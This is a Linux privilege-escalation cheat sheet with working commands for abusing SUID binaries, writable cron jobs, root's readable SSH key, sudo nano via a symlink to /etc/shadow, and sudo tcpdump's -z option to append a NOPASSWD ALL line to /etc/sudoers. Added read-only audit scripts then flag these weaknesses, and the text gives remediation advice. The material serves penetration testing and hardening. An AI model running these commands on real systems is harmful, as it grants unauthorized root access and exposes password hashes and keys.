Local Privilege Escalation

SUID

```bash
find / -perm -4000 2>/dev/null
```
Exploitation depends on what the SUID binary does. One that can read or write arbitrary files lets you grab SSH keys or /etc/shadow.

Cron

```bash
# Find cron files that anyone can write to
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when each job runs and which user it runs as
cat /etc/crontab

# Use a writable hourly job to copy the shadow file somewhere readable
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
```

Readable SSH

```bash
# Check whether /root can be listed
ls -la /root

# Check whether /root/.ssh can be listed
ls -la /root/.ssh

# Read the key (worth trying even if you can't list the contents of .ssh)
cat /root/.ssh/id_rsa

# Make an SSH dir for your own user
mkdir /home/<user>/.ssh

# Copy the key into it
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Restrict perms: ssh refuses a private key that group or other can read
chmod 600 /home/<user>/.ssh/id_rsa

# SSH in as root
ssh -i /home/<user>/.ssh/id_rsa root@<target>
```
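The SUID, Cron and Readable SSH sections above all come down to a file-permission mistake that a defender can check for before anyone else does. The script below is an added example, not code from the original page: a read-only audit with my own function names that takes a path argument so it can be run against a test tree as well as the live filesystem. It lists world-writable files (point it at /etc/cron*), lists SUID files to diff against a known-good baseline, and reports whether a private key is readable by group or other.

```shell
#!/bin/sh
# Added example, not part of the original page: a read-only audit that checks
# a tree for the three conditions the SUID, Cron and Readable SSH sections
# above depend on. Function names and the layout are my own; each function
# takes a path so it can be pointed at a test tree instead of the live system.

# Files under $1 that anyone can write (mode o+w). Run against /etc/cron* on a
# real host: a hit means an unprivileged user can schedule commands as root.
world_writable_files() {
    find "$1" -type f -perm -o+w 2>/dev/null | sort
}

# SUID files under $1. Diff the output against a known-good baseline taken at
# install time; an unexpected entry is what the SUID section above hunts for.
suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Return 0 when the private key at $1 is readable by group or other, i.e. when
# "cat /root/.ssh/id_rsa" from a low-privileged account would succeed.
# ls -ld prints a mode string like -rw-r--r--; columns 5 and 8 are the
# group and other read bits. A missing file is reported as not exposed.
key_is_exposed() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    case "$mode" in
        ????r*|???????r*) return 0 ;;
    esac
    return 1
}

# Human-readable report over a root directory and an optional key path.
audit_report() {
    echo "== world-writable files under $1/etc/cron* =="
    for d in "$1"/etc/cron*; do
        [ -e "$d" ] && world_writable_files "$d"
    done
    echo "== SUID files under $1 =="
    suid_files "$1"
    if [ -n "${2:-}" ]; then
        if key_is_exposed "$2"; then
            echo "== $2 is readable by group or other =="
        else
            echo "== $2 permissions look fine =="
        fi
    fi
}

# Usage on a live host (needs root to see /root):
#   sh fs_audit.sh / /root/.ssh/id_rsa
if [ $# -gt 0 ]; then
    audit_report "$@"
fi
```

The SUID list is only useful against a baseline: every distribution ships a handful of legitimate SUID binaries, so the signal is a new or unexpected entry, not the count.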

Symlink

```bash
# Check sudo rights
sudo -l

# If you have sudo rights for something like nano on a specific file,
# create a symlink from that file to /etc/shadow and then read it.
# The file in this example is readme.txt
ln -s /etc/shadow readme.txt

# Set a terminal type so nano can draw its screen
export TERM=xterm

# Read the file
sudo nano readme.txt
```

TCPDump

```bash
# If tcpdump is in the sudo list then we can abuse it

# Create a script at /tmp/elevate that grants the current user full sudo
cat > /tmp/elevate <<'EOF'
#!/bin/bash
echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers
EOF
chmod +x /tmp/elevate

# -G 1 rotates the capture file every second, -W 1 caps the file count,
# -z runs /tmp/elevate after each rotation, -Z root keeps it running as root
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

# Now get a root shell
sudo bash
```
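Both the Symlink and TCPDump sections start from `sudo -l`, which means the weakness is visible in the sudoers file itself long before anyone runs those commands. The script below is an added example, not code from the original page: an awk-based first-pass reviewer with my own function names and a constructed sample rule set. It flags rules that grant ALL, rules for nano (whose file argument can be a symlink, as the Symlink section shows) and rules for tcpdump (whose -z option runs a command as root, as the TCPDump section shows). It does not expand Cmnd_Alias entries or handle "!" negations, so it is a triage tool rather than a full sudoers parser.

```shell
#!/bin/sh
# Added example, not part of the original page: flag sudoers rules that the
# Symlink and TCPDump sections above show can be turned into a root shell.
# The function and the sample rules are my own; it only knows the three cases
# on this page (ALL, nano, tcpdump) and does not expand Cmnd_Alias entries
# or handle "!" negations, so treat it as a first pass, not a full parser.

# Read sudoers-style lines on stdin and print one "reason: rule" line for
# each user or group rule that should be reviewed.
flag_sudo_rules() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }            # comments, blank lines
        /^[ \t]*(Defaults|Cmnd_Alias|User_Alias|Host_Alias|Runas_Alias)/ { next }
        {
            spec = $0
            sub(/^[^=]*=/, "", spec)                 # keep text after "host="
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)  # drop "(runas)"
            sub(/^[ \t]*NOPASSWD:[ \t]*/, "", spec)  # drop tag
            compact = spec
            gsub(/[ \t]/, "", compact)
            if (compact == "ALL" || compact ~ /^ALL,/ || compact ~ /,ALL,/ || compact ~ /,ALL$/)
                print "grants ALL commands: " $0
            else if (spec ~ /\/nano$/ || spec ~ /\/nano[ \t]/)
                print "root editor, file argument can be a symlink: " $0
            else if (spec ~ /\/tcpdump$/ || spec ~ /\/tcpdump[ \t]/)
                print "tcpdump -z runs a post-rotate command as root: " $0
        }'
}

# Constructed sample for demonstration. On a live host run "visudo -c" first,
# then: cat /etc/sudoers /etc/sudoers.d/* | flag_sudo_rules
sample_rules() {
    cat <<'EOF'
# constructed sample sudoers
Defaults env_reset
root ALL=(ALL:ALL) ALL
james ALL=(root) NOPASSWD: /usr/bin/nano /home/james/readme.txt
ops ALL=(root) NOPASSWD: /usr/sbin/tcpdump
backup ALL=(root) /usr/bin/rsync
%admin ALL=(ALL) ALL
EOF
}

# Number of flagged rules in the sample (4 of the 5 rules; rsync is not flagged).
flagged_count() {
    sample_rules | flag_sudo_rules | grep -c .
}

if [ $# -gt 0 ] && [ "$1" = "--demo" ]; then
    sample_rules | flag_sudo_rules
fi
```

The fix for a flagged nano rule is not a tighter file argument but a different tool (sudoedit works on a copy and checks the target), and for tcpdump the post-rotate option has to be denied outright rather than trusting the packet-capture binary to stay a packet-capture binary. Either way, an unexpected line appended to /etc/sudoers, like the one the TCPDump section writes, is something file-integrity monitoring should alert on.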